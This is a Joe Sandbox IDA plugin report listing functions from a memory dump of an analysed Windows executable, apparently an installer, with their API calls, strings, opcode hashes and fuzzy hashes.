Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
String ID:
API String ID: 2502006586-0
Opcode ID: 93cc6d3c32f59bb0d3866a424ed22eeeeb8d669c97e98ac0717914e792a0e722
Instruction ID: 54132ba296c0afcfcf6bcc6108250e3b4accff89e00e7de8f4d517709d1e9298
Opcode Fuzzy Hash: 93cc6d3c32f59bb0d3866a424ed22eeeeb8d669c97e98ac0717914e792a0e722
Instruction Fuzzy Hash: CF41D571A04258AFCB10DFA9C885A9FBBB4EF55704F1484AAF500EB351D3389D11CBA5

Function 0045D0F4 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000057,00000000,0045D1C0,?,?,?,?,00000000), ref: 0045D15F
SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D22C,?,00000000,0045D1C0,?,?,?,?,00000000), ref: 0045D19E

Strings

MACHINE, xrefs: 0045D142
CLASSES_ROOT, xrefs: 0045D124
CURRENT_USER, xrefs: 0045D133
USERS, xrefs: 0045D151

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
API String ID: 1452528299-1580325520
Opcode ID: e5d6d334a763e1cbb8f1666fe6de59715d05f57489b5bab2b54e19ba110a4e8d
Instruction ID: 7b2924e434c2d2a6e8a64b45c898520acf8211660a530507fefc98e5318dd698
Opcode Fuzzy Hash: e5d6d334a763e1cbb8f1666fe6de59715d05f57489b5bab2b54e19ba110a4e8d
Instruction Fuzzy Hash: C911D535A04A04AFDB31DEA1C941A9E76ADDF44306F6040777C00A2783D63C9F0AD52E

Function 0041BD9C Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
GetDC.USER32(00000000), ref: 0041BDF9
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE20
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE2D
ReleaseDC.USER32(00000000,00000000), ref: 0041BE66

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: e7ae0f99dd269f353d7b7641ed485f387b8aeae4be2e5651bec5d04fa653b95a
Instruction ID: e886330f15f7a5316131e86c26d6fb078e3572472e198ea0fe97a07bc4f3c0b5
Opcode Fuzzy Hash: e7ae0f99dd269f353d7b7641ed485f387b8aeae4be2e5651bec5d04fa653b95a
Instruction Fuzzy Hash: 54212A74E04748AFEB00EFA9C942BEEB7B4EB48714F10842AF514B7781D7785940CBA9

Function 00401A90 Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0049C420,00000000,00401B68), ref: 00401ABD
LocalFree.KERNEL32(00598500,00000000,00401B68), ref: 00401ACF
VirtualFree.KERNEL32(?,00000000,00008000,00598500,00000000,00401B68), ref: 00401AEE
LocalFree.KERNEL32(00599500,?,00000000,00008000,00598500,00000000,00401B68), ref: 00401B2D
RtlLeaveCriticalSection.KERNEL32(0049C420,00401B6F), ref: 00401B58
RtlDeleteCriticalSection.KERNEL32(0049C420,00401B6F), ref: 00401B62

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 881435858a3df7288aae927e3c0e93e2fd7e3e12d101c835c3d014fcf42cc859
Instruction ID: ece8596464e12e4b83b5bd96c0fd07c419ca8ccd111934747786d766a0fa6b25
Opcode Fuzzy Hash: 881435858a3df7288aae927e3c0e93e2fd7e3e12d101c835c3d014fcf42cc859
Instruction Fuzzy Hash: AC119D30B403405BEB15ABA59CE2B363BE4A765708F94007BF40067AF1D67C984087AE

Function 0047EBDC Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EC), ref: 0047EBEA
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CE49), ref: 0047EC10
GetWindowLongA.USER32(?,000000EC), ref: 0047EC20
SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047EC41
ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047EC55
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047EC71

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Long$Show
String ID:
API String ID: 3609083571-0
Opcode ID: 5cd40674e0b8a30ca8b6933e71840c0df1b24ef64ec96d3901f5dc784d2e9b41
Instruction ID: c412bc1a630f4fb8f5d2bcb23b9cdd23b166c0171215975471963c460da52ad8
Opcode Fuzzy Hash: 5cd40674e0b8a30ca8b6933e71840c0df1b24ef64ec96d3901f5dc784d2e9b41
Instruction Fuzzy Hash: 13014CB6651210AFD710DB69CE85F2637D8AB0D330F0946A6B549EF2E3C228DC408B08

Function 0041B280 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B

UnrealizeObject.GDI32(00000000), ref: 0041B28C
SelectObject.GDI32(?,00000000), ref: 0041B29E
SetBkColor.GDI32(?,00000000), ref: 0041B2C1
SetBkMode.GDI32(?,00000002), ref: 0041B2CC
SetBkColor.GDI32(?,00000000), ref: 0041B2E7
SetBkMode.GDI32(?,00000001), ref: 0041B2F2

Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
Instruction ID: f7789479bb42d6d63a82e92436423a6fea40f6b6a905c0023d8cad956bbacbbe
Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
Instruction Fuzzy Hash: BAF072B56015019BDE00FFBAD9CAE4B77989F043097088457B944DF197C97DD8548B3D

Function 00498434 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

ShowWindow.USER32(?,00000005,00000000,00498699,?,?,00000000), ref: 0049846A

Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7

Part of subcall function 004072B8: SetCurrentDirectoryA.KERNEL32(00000000,?,00498492,00000000,00498665,?,?,00000005,00000000,00498699,?,?,00000000), ref: 004072C3

Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,00456126,00000000,0045618E), ref: 0042D491

Strings

.dat, xrefs: 004984B1
IMsg, xrefs: 0049853E
Uninstall, xrefs: 00498450
.msg, xrefs: 004984D0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
String ID: .dat$.msg$IMsg$Uninstall
API String ID: 3312786188-1660910688
Opcode ID: 7b37453165c360702e9c28103bf074bd5e317765a346751ca472e497e5ab201f
Instruction ID: 94d9a00f42835dc9211730c265b92997509a8ce46d72803125f61036d3c10121
Opcode Fuzzy Hash: 7b37453165c360702e9c28103bf074bd5e317765a346751ca472e497e5ab201f
Instruction Fuzzy Hash: 22315574A00114AFCB00FF69DC52D9EBBB5EB49318F51847AF810AB751DB39AD04CB58

Function 0042EAB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19

Strings

user32.dll, xrefs: 0042EAE5
ShutdownBlockReasonCreate, xrefs: 0042EAE0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressByteCharHandleModuleMultiProcWide
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 828529508-2866557904
Opcode ID: d7b5e8f06d25cf2e82843ddd2a686aee5f6cfebd975f7e169ae89c51933d11b0
Instruction ID: 8013201a01c1a3ce4b1282a4ea415291a3823007c30eea77c81bb12cf145ddb4
Opcode Fuzzy Hash: d7b5e8f06d25cf2e82843ddd2a686aee5f6cfebd975f7e169ae89c51933d11b0
Instruction Fuzzy Hash: 34F0C8D174066137E620A57F9C83F6B598C8F94759F140436F109E62C1D96C9905426E

Function 004580A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004580D0
GetExitCodeProcess.KERNEL32(?,?), ref: 004580F1
CloseHandle.KERNEL32(?,00458124), ref: 00458117

Strings

GetExitCodeProcess, xrefs: 004580FA
MsgWaitForMultipleObjects, xrefs: 004580DD

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCodeExitHandleMultipleObjectsProcessWait
String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
API String ID: 2573145106-3235461205
Opcode ID: 48654442b45b242062e68cf3d97dab4c0ed917fb54e1286c856b08e600caecae
Instruction ID: eff4a35bea7a62289d80d9c26220f44f895e3d9a2531d43f7f7dfd5bd268873c
Opcode Fuzzy Hash: 48654442b45b242062e68cf3d97dab4c0ed917fb54e1286c856b08e600caecae
Instruction Fuzzy Hash: C401A230600604AFDB10EBA98C42E2E73A8EB49755F10457ABC10E73C3EE389D059B18

Function 0042E9BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,0049A934,00457299,0045763C,004571F0,00000000,00000B06,00000000,00000000,00000000,00000002,00000000), ref: 0042E9D2
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
InterlockedExchange.KERNEL32(0049C660,00000001), ref: 0042E9E9

Strings

ChangeWindowMessageFilter, xrefs: 0042E9C8
user32.dll, xrefs: 0042E9CD

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressExchangeHandleInterlockedModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 3478007392-2498399450
Opcode ID: 29e3fe99fd39411a87420eaca3bfaa87a3f8c8d91b56c7102c175830130eccb1
Instruction ID: c49eaaa8fdb071360f38502b50e3c23bad510ecb3814e64996c12b789333cacc
Opcode Fuzzy Hash: 29e3fe99fd39411a87420eaca3bfaa87a3f8c8d91b56c7102c175830130eccb1
Instruction Fuzzy Hash: 78E0ECB1740314AAEA10AB62AECBF662558AB24F19F902437F101B51E2C7FC0C84C92D

Function 00477FD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00477FD8
GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,004780CF,0049D0A8,00000000), ref: 00477FEB
GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477FF1

Strings

user32.dll, xrefs: 00477FE6
AllowSetForegroundWindow, xrefs: 00477FE1

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProcProcessThreadWindow
String ID: AllowSetForegroundWindow$user32.dll
API String ID: 1782028327-3855017861
Opcode ID: 4365f07802c1d4a062b6a547225ad7893818e73781abac978e1d5f5c77ef267c
Instruction ID: f8b3738cd9567d8133e7bb9c55c493c63169bafd132c11812e06eb582868bf74
Opcode Fuzzy Hash: 4365f07802c1d4a062b6a547225ad7893818e73781abac978e1d5f5c77ef267c
Instruction Fuzzy Hash: 92D0C7B168074165D95073B54D4EF9F225C9A4471C715C83FB548E2185DE7CD809457D

Function 00416C3C Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 00416C62
SaveDC.GDI32(?), ref: 00416C93
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
RestoreDC.GDI32(?,?), ref: 00416D1B
EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 6e943c95b49c6f236292f7e3f4c968b2c26fc47392d5a45f7d0b8c39400a8a14
Instruction ID: fd6e93c78d11005d9ba704e8aa7896ba8bfa997e2438936ed7ae042a7726967b
Opcode Fuzzy Hash: 6e943c95b49c6f236292f7e3f4c968b2c26fc47392d5a45f7d0b8c39400a8a14
Instruction Fuzzy Hash: 67411C70A04204AFDB04DB99D985FAAB7F9FF48304F1680AEE4059B362D778ED45CB58

Function 00414810 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,?,?), ref: 00414846
MulDiv.KERNEL32(?,?,?), ref: 00414860
MulDiv.KERNEL32(?,?,?), ref: 00414889
MulDiv.KERNEL32(?,?,?), ref: 004148B4
MulDiv.KERNEL32(00000000,?,00000000), ref: 004148FC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19

Function 004297DC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 37c779b953a04f4a12efe840b5dae96d6b1eda754ba999e5db1c97090b84cbca
Instruction ID: 3a43d17cedf841754d2741ff269161da15bdaac6ac028e7563c87cbc4d8d060b
Opcode Fuzzy Hash: 37c779b953a04f4a12efe840b5dae96d6b1eda754ba999e5db1c97090b84cbca
Instruction Fuzzy Hash: 87219D707507057AE710BB66CC82F5B76ECEB41708F94043EB541AB2D2DF78AD41861C

Function 0041BBC8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
GetDC.USER32(00000000), ref: 0041BC22
CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC69
DeleteObject.GDI32(00000000), ref: 0041BCAA

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MetricsSystem$BitmapCreateDeleteObject
String ID:
API String ID: 1095203571-0
Opcode ID: 6e5f92cac6927d4c8622965cf5499bf0577c4e8cc05c04df1912703be0f6a612
Instruction ID: c69e797babd58ff3ff02391fbdd927ad6b6ed61c45feb1cc22c7e7fbd0aaf132
Opcode Fuzzy Hash: 6e5f92cac6927d4c8622965cf5499bf0577c4e8cc05c04df1912703be0f6a612
Instruction Fuzzy Hash: BA314F74E00209EFDB04DFA5CA41AAEB7F5EB48700F1185AAF514AB381D7789E40DB98

Function 00473A14 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0045D0F4: SetLastError.KERNEL32(00000057,00000000,0045D1C0,?,?,?,?,00000000), ref: 0045D15F

GetLastError.KERNEL32(00000000,00000000,00000000,00473AE8,?,?,0049D1E0,00000000), ref: 00473AA1
GetLastError.KERNEL32(00000000,00000000,00000000,00473AE8,?,?,0049D1E0,00000000), ref: 00473AB7

Strings

Setting permissions on registry key: %s\%s, xrefs: 00473A66
Could not set permissions on the registry key because it currently does not exist., xrefs: 00473AAB
Failed to set permissions on registry key (%d)., xrefs: 00473AC8

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
API String ID: 1452528299-4018462623
Opcode ID: 4607364518860baa8c25b99786c39b8e95e77fc7ad03eb8564835eea2eb2ed49
Instruction ID: 0b47f7c1dfc919aadf9eca7aecddead5c0e22d63d641398338859fb193043b06
Opcode Fuzzy Hash: 4607364518860baa8c25b99786c39b8e95e77fc7ad03eb8564835eea2eb2ed49
Instruction Fuzzy Hash: 29219570A042445FCB10DFA9D8426EEBBE8EF49315F50817BE448E7392D7785E05CBA9

Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

